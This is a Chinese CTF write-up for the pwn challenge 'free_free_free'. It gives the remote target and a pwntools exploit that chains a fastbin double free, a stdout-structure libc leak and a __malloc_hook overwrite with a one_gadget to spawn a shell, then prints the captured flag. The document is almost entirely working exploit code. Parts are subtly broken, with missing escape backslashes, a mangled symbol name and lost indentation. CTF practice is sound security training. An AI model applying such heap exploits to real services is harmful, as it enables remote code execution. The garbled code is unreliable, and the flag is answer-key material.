题目名称:free_free_free
题目内容:你一定很擅长free吧。靶机:nc 183.129.189.60 10023
题目分值:300.0
题目难度:中等
相关附件:free_free_free的附件.zip
#!/usr/bin/env python from pwn import *
local = 0
debug = 0
binary = "./free_free_free"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
elf = ELF(binary)
context.log_level = "debug" if debug else "info"
if local:
# p = process(binary) libc = ELF(lib)
else :
# p = remote("183.129.189.60","10023")
# lib = "./libc.so.6"
libc = ELF(lib)
s = lambda buf : p.send(buf)
sl = lambda buf : p.sendline(buf)
sa = lambda delim, buf : p.sendafter(delim, buf)
sal = lambda delim, buf : p.sendlineafter(delim, buf)
sh = lambda : p.interactive()
r = lambda n=None : p.recv(n)
ru = lambda delim : p.recvuntil(delim)
r7f = lambda : u64(p.recvuntil("x7f")[-6:]+"x00x00")
trs = lambda addr : libc.address+addr
gadget = lambda ins : libc.search(asm(ins,arch="amd64")).next()
tohex = lambda buf : "".join("\x%02x"%ord(_) for _ in buf)
def add(size,content):
sal("> ","1")
sal("size> ",str(size))
sa("message> ",content)
def free(id):
sal("> ","2")
sal("idx> ",str(id))
def pwn():
add(0x78+1,"0"*8)
add(0x60,"1"*8)
add(0x60,"2"*8)
free(0)
add(0x18,"3"*8)
add(0x60,"xddx65")
free(2)
free(1)
free(2)
add(0x60,chr(0x20))
add(0x60,"tmp")
add(0x60,"tmp")
# raw_input()
add(0x60,"tmp")
payload = ""
payload += chr(0)*(0x33)
payload += p64(0xfbad3887)
payload += p64(0)*3
payload += "x88" #_chain filed
add(0x68,payload)
libc.address = r7f()-libc.sym["_IO_2_1_stdin_"]
info("libc basse => 0x%x"%libc.address)
ogg = [trs(_) for _ in(0x45226,0x4527a,0xf03a4,0xf1247)]
og = ogg[1]
free(2)
free(1)
free(2)
add(0x60,p64(libc.sym[" malloc_hook"]-0x23))
add(0x60,"tmp")
add(0x60,"tmp")
payload = ""
payload += chr(0)*(0x13-8)
payload += p64(og)
payload += p64(libc.sym["realloc"]+16)
add(0x68,payload)
sl("1")
sl("17")
while True:
try:
# p = process(binary)
p = remote("183.129.189.60","10023")
pwn()
break
except:
p.close()
raw_input("[*] get shell")
sh()
# DASCTF{7a95efe41004077a790d234f5b90c343}
